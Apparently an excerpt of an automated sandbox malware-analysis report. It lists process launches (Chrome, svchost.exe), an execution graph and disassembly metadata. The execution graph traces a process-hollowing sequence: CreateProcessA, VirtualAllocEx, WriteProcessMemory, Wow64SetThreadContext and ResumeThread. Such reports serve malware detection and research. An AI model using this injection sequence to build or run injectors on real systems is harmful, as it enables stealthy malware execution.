                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:133
                                                                                                                                                                                            Start time:12:45:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:134
                                                                                                                                                                                            Start time:12:45:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:135
                                                                                                                                                                                            Start time:12:45:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:136
                                                                                                                                                                                            Start time:12:45:20
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:137
                                                                                                                                                                                            Start time:12:45:20
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:138
                                                                                                                                                                                            Start time:12:45:23
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:139
                                                                                                                                                                                            Start time:12:45:23
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:140
                                                                                                                                                                                            Start time:12:45:23
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:141
                                                                                                                                                                                            Start time:12:45:28
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:142
                                                                                                                                                                                            Start time:12:45:32
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:143
                                                                                                                                                                                            Start time:12:45:45
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:9.1%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:1.2%
                                                                                                                                                                                              Total number of Nodes:249
                                                                                                                                                                                              Total number of Limit Nodes:9
                                                                                                                                                                                              execution_graph 37850 4f1ab00 37851 4f1ab3a 37850->37851 37852 4f1abb6 37851->37852 37853 4f1abcb 37851->37853 37858 4f198cc 37852->37858 37854 4f198cc 3 API calls 37853->37854 37856 4f1abda 37854->37856 37860 4f198d7 37858->37860 37859 4f1abc1 37860->37859 37863 4f1bdd0 37860->37863 37869 4f1bdbf 37860->37869 37875 4f19a0c 37863->37875 37866 4f1bdf7 37866->37859 37867 4f1be0f CreateIconFromResourceEx 37868 4f1be9e 37867->37868 37868->37859 37870 4f1bdea 37869->37870 37871 4f19a0c CreateIconFromResourceEx 37869->37871 37872 4f1bdf7 37870->37872 37873 4f1be0f CreateIconFromResourceEx 37870->37873 37871->37870 37872->37859 37874 4f1be9e 37873->37874 37874->37859 37876 4f1be20 CreateIconFromResourceEx 37875->37876 37877 4f1bdea 37876->37877 37877->37866 37877->37867 37878 7762c80 37879 7762e0b 37878->37879 37880 7762ca6 37878->37880 37880->37879 37883 7762f00 PostMessageW 37880->37883 37885 7762ef9 37880->37885 37884 7762f6c 37883->37884 37884->37880 37886 7762f00 PostMessageW 37885->37886 37887 7762f6c 37886->37887 37887->37880 37888 dfdca8 DuplicateHandle 37889 dfdd3e 37888->37889 37890 df4668 37891 df4672 37890->37891 37895 df4759 37890->37895 37900 df3e40 37891->37900 37896 df477d 37895->37896 37904 df4859 37896->37904 37908 df4868 37896->37908 37901 df3e4b 37900->37901 37916 df738c 37901->37916 37903 df774f 37906 df4868 37904->37906 37905 df496c 37905->37905 37906->37905 37912 df44c4 37906->37912 37910 df488f 37908->37910 37909 df496c 37909->37909 37910->37909 37911 df44c4 CreateActCtxA 37910->37911 37911->37909 37913 df58f8 CreateActCtxA 37912->37913 37915 df59bb 37913->37915 37917 df7397 37916->37917 37920 df741c 37917->37920 37919 df7a35 37919->37903 37921 df7427 37920->37921 37924 df744c 37921->37924 37923 df7b1a 37923->37919 37925 df7457 37924->37925 37928 df746c 37925->37928 37927 df7c0d 37927->37923 37929 df7477 37928->37929 37931 df8feb 37929->37931 37935 dfb290 37929->37935 37930 df9029 37930->37927 37931->37930 37939 dfd390 37931->37939 37943 dfd381 37931->37943 37947 dfb6d0 37935->37947 37950 dfb6c0 37935->37950 37936 dfb2a6 37936->37931 37940 dfd3b1 37939->37940 37941 dfd3d5 37940->37941 37965 dfd948 37940->37965 37941->37930 37944 dfd3b1 37943->37944 37945 dfd3d5 37944->37945 37946 dfd948 2 API calls 37944->37946 37945->37930 37946->37945 37954 dfb7b7 37947->37954 37948 dfb6df 37948->37936 37951 dfb6d0 37950->37951 37953 dfb7b7 2 API calls 37951->37953 37952 dfb6df 37952->37936 37953->37952 37955 dfb7d9 37954->37955 37956 dfb7fc 37954->37956 37955->37956 37957 dfb7f4 37955->37957 37961 dfba52 37955->37961 37956->37948 37957->37956 37958 dfba00 GetModuleHandleW 37957->37958 37959 dfba2d 37958->37959 37959->37948 37962 dfba01 GetModuleHandleW 37961->37962 37964 dfba5a 37961->37964 37963 dfba2d 37962->37963 37963->37957 37964->37957 37966 dfd955 37965->37966 37967 dfd98f 37966->37967 37969 dfd750 37966->37969 37967->37941 37970 dfd75b 37969->37970 37971 dfe2a0 37970->37971 37973 dfd87c 37970->37973 37974 dfd887 37973->37974 37975 df746c 2 API calls 37974->37975 37976 dfe30f 37975->37976 37976->37971 37659 7760b19 37660 7760b1f 37659->37660 37661 7760b7a 37659->37661 37665 7761a38 37660->37665 37670 7761a48 37660->37670 37662 7760efa 37666 7761a48 37665->37666 37675 7761a88 37666->37675 37680 7761a79 37666->37680 37667 7761a6f 37667->37662 37671 7761a5d 37670->37671 37673 7761a88 12 API calls 37671->37673 37674 7761a79 12 API calls 37671->37674 37672 7761a6f 37672->37662 37673->37672 37674->37672 37676 7761aa2 37675->37676 37685 7761d6a 37676->37685 37704 7761d78 37676->37704 37677 7761ac6 37677->37667 37681 7761aa2 37680->37681 37683 7761d6a 12 API calls 37681->37683 37684 7761d78 12 API calls 37681->37684 37682 7761ac6 37682->37667 37683->37682 37684->37682 37686 7761d8d 37685->37686 37687 7761d9f 37686->37687 37723 7762363 37686->37723 37728 7762502 37686->37728 37733 7761f04 37686->37733 37737 7762304 37686->37737 37742 7762426 37686->37742 37747 7762030 37686->37747 37754 7761fb4 37686->37754 37759 7761e94 37686->37759 37763 7762377 37686->37763 37768 7762329 37686->37768 37773 7761f69 37686->37773 37778 77625e8 37686->37778 37782 776204a 37686->37782 37787 776224f 37686->37787 37794 7762440 37686->37794 37798 7761ee3 37686->37798 37687->37677 37705 7761d8d 37704->37705 37706 7761d9f 37705->37706 37707 7762377 2 API calls 37705->37707 37708 7761e94 2 API calls 37705->37708 37709 7761fb4 2 API calls 37705->37709 37710 7762030 4 API calls 37705->37710 37711 7762426 2 API calls 37705->37711 37712 7762304 2 API calls 37705->37712 37713 7761f04 2 API calls 37705->37713 37714 7762502 2 API calls 37705->37714 37715 7762363 2 API calls 37705->37715 37716 7761ee3 2 API calls 37705->37716 37717 7762440 2 API calls 37705->37717 37718 776224f 4 API calls 37705->37718 37719 776204a 2 API calls 37705->37719 37720 77625e8 2 API calls 37705->37720 37721 7761f69 2 API calls 37705->37721 37722 7762329 2 API calls 37705->37722 37706->37677 37707->37706 37708->37706 37709->37706 37710->37706 37711->37706 37712->37706 37713->37706 37714->37706 37715->37706 37716->37706 37717->37706 37718->37706 37719->37706 37720->37706 37721->37706 37722->37706 37724 7762370 37723->37724 37802 7760210 37724->37802 37806 7760218 37724->37806 37725 7762890 37730 776230b 37728->37730 37729 7762890 37731 7760210 ResumeThread 37730->37731 37732 7760218 ResumeThread 37730->37732 37731->37729 37732->37729 37734 7761eef 37733->37734 37734->37733 37810 77602c0 37734->37810 37814 77602c8 37734->37814 37738 776230a 37737->37738 37740 7760210 ResumeThread 37738->37740 37741 7760218 ResumeThread 37738->37741 37739 7762890 37739->37739 37740->37739 37741->37739 37743 7761f80 37742->37743 37818 77603a0 37743->37818 37822 7760398 37743->37822 37744 77627cb 37744->37744 37748 7762036 37747->37748 37826 7760460 37748->37826 37830 7760459 37748->37830 37749 7761eef 37752 77602c0 Wow64SetThreadContext 37749->37752 37753 77602c8 Wow64SetThreadContext 37749->37753 37752->37749 37753->37749 37755 7761f80 37754->37755 37755->37687 37757 77603a0 VirtualAllocEx 37755->37757 37758 7760398 VirtualAllocEx 37755->37758 37756 77627cb 37757->37756 37758->37756 37834 77606dd 37759->37834 37838 77606e8 37759->37838 37764 7762322 37763->37764 37766 7760210 ResumeThread 37764->37766 37767 7760218 ResumeThread 37764->37767 37765 7762890 37766->37765 37767->37765 37769 7762336 37768->37769 37770 776256e 37768->37770 37771 77602c0 Wow64SetThreadContext 37770->37771 37772 77602c8 Wow64SetThreadContext 37770->37772 37771->37769 37772->37769 37774 7761f6f 37773->37774 37776 77603a0 VirtualAllocEx 37774->37776 37777 7760398 VirtualAllocEx 37774->37777 37775 77627cb 37776->37775 37777->37775 37780 7760460 WriteProcessMemory 37778->37780 37781 7760459 WriteProcessMemory 37778->37781 37779 7762403 37780->37779 37781->37779 37783 776206d 37782->37783 37785 7760460 WriteProcessMemory 37783->37785 37786 7760459 WriteProcessMemory 37783->37786 37784 77624b0 37784->37687 37785->37784 37786->37784 37788 7762264 37787->37788 37790 7760460 WriteProcessMemory 37788->37790 37791 7760459 WriteProcessMemory 37788->37791 37789 7761eef 37792 77602c0 Wow64SetThreadContext 37789->37792 37793 77602c8 Wow64SetThreadContext 37789->37793 37790->37789 37791->37789 37792->37789 37793->37789 37842 7760550 37794->37842 37846 7760548 37794->37846 37795 7762462 37799 7761eef 37798->37799 37800 77602c0 Wow64SetThreadContext 37799->37800 37801 77602c8 Wow64SetThreadContext 37799->37801 37800->37799 37801->37799 37803 7760258 ResumeThread 37802->37803 37805 7760289 37803->37805 37805->37725 37807 7760258 ResumeThread 37806->37807 37809 7760289 37807->37809 37809->37725 37811 776030d Wow64SetThreadContext 37810->37811 37813 7760355 37811->37813 37813->37734 37815 776030d Wow64SetThreadContext 37814->37815 37817 7760355 37815->37817 37817->37734 37819 77603e0 VirtualAllocEx 37818->37819 37821 776041d 37819->37821 37821->37744 37823 77603e0 VirtualAllocEx 37822->37823 37825 776041d 37823->37825 37825->37744 37827 77604a8 WriteProcessMemory 37826->37827 37829 77604ff 37827->37829 37829->37749 37831 77604a8 WriteProcessMemory 37830->37831 37833 77604ff 37831->37833 37833->37749 37835 7760771 CreateProcessA 37834->37835 37837 7760933 37835->37837 37837->37837 37839 7760771 CreateProcessA 37838->37839 37841 7760933 37839->37841 37843 776059b ReadProcessMemory 37842->37843 37845 77605df 37843->37845 37845->37795 37847 776059b ReadProcessMemory 37846->37847 37849 77605df 37847->37849 37849->37795 37977 dfda60 37978 dfdaa6 GetCurrentProcess 37977->37978 37980 dfdaf8 GetCurrentThread 37978->37980 37981 dfdaf1 37978->37981 37982 dfdb2e 37980->37982 37983 dfdb35 GetCurrentProcess 37980->37983 37981->37980 37982->37983 37984 dfdb6b GetCurrentThreadId 37983->37984 37986 dfdbc4 37984->37986

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 04F140D0 Relevance: 7.0, Strings: 5, Instructions: 725COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                                                                                                              • API String ID: 0-3486158592
                                                                                                                                                                                              • Opcode ID: f01c564ff6380b5fbc79cf30cdec80f459e330f58cebaebcadf132a81d00c163
                                                                                                                                                                                              • Instruction ID: 38269f21f96efc2463c3e39039001fe1ef8ba8d1ae15d9e34c65e054af5af1dd
                                                                                                                                                                                              • Opcode Fuzzy Hash: f01c564ff6380b5fbc79cf30cdec80f459e330f58cebaebcadf132a81d00c163
                                                                                                                                                                                              • Instruction Fuzzy Hash: 79524D35B001159FCB18DF69C898AAEBBB6BFC8750B158169E815DB374DB31EC42CB90
                                                                                                                                                                                              Function 04F198CC Relevance: 6.9, Strings: 5, Instructions: 622COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 526 4f198cc-4f1ac20 529 4f1b0e6-4f1b14c 526->529 530 4f1ac26-4f1ac2b 526->530 537 4f1b153-4f1b1db 529->537 530->529 531 4f1ac31-4f1ac4e 530->531 531->537 538 4f1ac54-4f1ac58 531->538 583 4f1b1e6-4f1b268 537->583 539 4f1ac67-4f1ac6b 538->539 540 4f1ac5a-4f1ac64 call 4f1990c 538->540 541 4f1ac7a-4f1ac81 539->541 542 4f1ac6d-4f1ac77 call 4f1990c 539->542 540->539 547 4f1ac87-4f1aca1 541->547 548 4f1ad79-4f1ad7e 541->548 542->541 564 4f1aca9-4f1ad6d call 4f19918 * 2 547->564 551 4f1ad80-4f1ad84 548->551 552 4f1ad86-4f1ad8b 548->552 551->552 555 4f1ad8d-4f1ad91 551->555 556 4f1ad9d-4f1adcd call 4f19924 * 3 552->556 558 4f1ad97-4f1ad9a 555->558 559 4f1b479-4f1b48c 555->559 582 4f1add3-4f1add6 556->582 556->583 558->556 570 4f1b495-4f1b4cb 559->570 571 4f1b48e-4f1b494 559->571 564->548 587 4f1ad6f 564->587 571->570 582->583 585 4f1addc-4f1adde 582->585 597 4f1b270-4f1b2f2 583->597 585->583 590 4f1ade4-4f1ae19 585->590 587->548 590->597 598 4f1ae1f-4f1ae28 590->598 604 4f1b2fa-4f1b37c 597->604 599 4f1af8b-4f1af8f 598->599 600 4f1ae2e-4f1ae88 call 4f19924 * 2 call 4f19934 * 2 598->600 603 4f1af95-4f1af99 599->603 599->604 645 4f1ae9a 600->645 646 4f1ae8a-4f1ae93 600->646 607 4f1b384-4f1b3b1 603->607 608 4f1af9f-4f1afa5 603->608 604->607 622 4f1b3b8-4f1b43a 607->622 611 4f1afa7 608->611 612 4f1afa9-4f1afde 608->612 616 4f1afe5-4f1afeb 611->616 612->616 621 4f1aff1-4f1aff9 616->621 616->622 627 4f1b000-4f1b002 621->627 628 4f1affb-4f1afff 621->628 680 4f1b442-4f1b471 622->680 634 4f1b064-4f1b06a 627->634 635 4f1b004-4f1b028 627->635 628->627 639 4f1b089-4f1b0be 634->639 640 4f1b06c-4f1b087 634->640 665 4f1b031-4f1b035 635->665 666 4f1b02a-4f1b02f 635->666 659 4f1b0c5-4f1b0d1 639->659 640->659 651 4f1ae9e-4f1aea0 645->651 646->651 652 4f1ae95-4f1ae98 646->652 660 4f1aea2 651->660 661 4f1aea7-4f1aeab 651->661 652->651 659->680 681 4f1b0d7-4f1b0e3 659->681 660->661 663 4f1aeb9-4f1aebf 661->663 664 4f1aead-4f1aeb4 661->664 667 4f1aec1-4f1aec7 663->667 668 4f1aec9-4f1aece 663->668 670 4f1af56-4f1af5a 664->670 665->559 672 4f1b03b-4f1b03e 665->672 671 4f1b041-4f1b052 666->671 676 4f1aed4-4f1aeda 667->676 668->676 678 4f1af79-4f1af85 670->678 679 4f1af5c-4f1af76 670->679 716 4f1b054 call 4f1bdd0 671->716 717 4f1b054 call 4f1bdbf 671->717 672->671 684 4f1aee0-4f1aee5 676->684 685 4f1aedc-4f1aede 676->685 678->599 678->600 679->678 680->559 690 4f1aee7-4f1aef9 684->690 685->690 686 4f1b05a-4f1b062 686->659 696 4f1af03-4f1af08 690->696 697 4f1aefb-4f1af01 690->697 698 4f1af0e-4f1af15 696->698 697->698 703 4f1af17-4f1af19 698->703 704 4f1af1b 698->704 705 4f1af20-4f1af2b 703->705 704->705 707 4f1af2d-4f1af30 705->707 708 4f1af4f 705->708 707->670 711 4f1af32-4f1af38 707->711 708->670 712 4f1af3a-4f1af3d 711->712 713 4f1af3f-4f1af48 711->713 712->708 712->713 713->670 715 4f1af4a-4f1af4d 713->715 715->670 715->708 716->686 717->686
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                                              • API String ID: 0-1677660839
                                                                                                                                                                                              • Opcode ID: b8a01fcacc513a182ac45f87cc69bc08ffb222a0dba41c5ad8bffd0a1f2e2bf1
                                                                                                                                                                                              • Instruction ID: b9cc322a40aae270bdc048ed9e36375e624e0647c2701be7a8df400b5928cd7b
                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a01fcacc513a182ac45f87cc69bc08ffb222a0dba41c5ad8bffd0a1f2e2bf1
                                                                                                                                                                                              • Instruction Fuzzy Hash: CE326170E00218CFDB54DFB9C85579EBBF2AF84300F14856AD449AB3A5DB34AD46CB91
                                                                                                                                                                                              Function 04F16EFE Relevance: 2.1, Strings: 1, Instructions: 812COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1028 4f16efe-4f16f02 1029 4f16f03-4f16f18 1028->1029 1030 4f178c5-4f17a2b 1028->1030 1029->1030 1031 4f16f19-4f16f24 1029->1031 1033 4f16f2a-4f16f36 1031->1033 1034 4f16f42-4f16f51 1033->1034 1036 4f16fb0-4f16fb4 1034->1036 1037 4f16fba-4f16fc3 1036->1037 1038 4f1705c-4f170c6 1036->1038 1039 4f16fc9-4f16fdf 1037->1039 1040 4f16ebe-4f16eca 1037->1040 1038->1030 1076 4f170cc-4f17613 1038->1076 1047 4f17031-4f17043 1039->1047 1048 4f16fe1-4f16fe4 1039->1048 1040->1030 1042 4f16ed0-4f16edc 1040->1042 1043 4f16f53-4f16f59 1042->1043 1044 4f16ede-4f16ef2 1042->1044 1043->1030 1049 4f16f5f-4f16f77 1043->1049 1044->1043 1054 4f16ef4-4f16efd 1044->1054 1057 4f17804-4f178ba 1047->1057 1058 4f17049-4f1704c 1047->1058 1048->1030 1051 4f16fea-4f17027 1048->1051 1049->1030 1056 4f16f7d-4f16fa5 1049->1056 1051->1038 1072 4f17029-4f1702f 1051->1072 1054->1028 1056->1036 1057->1030 1061 4f1704f-4f17059 1058->1061 1072->1047 1072->1048 1154 4f17615-4f1761f 1076->1154 1155 4f1762a-4f176bd 1076->1155 1156 4f17625 1154->1156 1157 4f176c8-4f1775b 1154->1157 1155->1157 1159 4f17766-4f177f9 1156->1159 1157->1159 1159->1057
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 0-2746444292
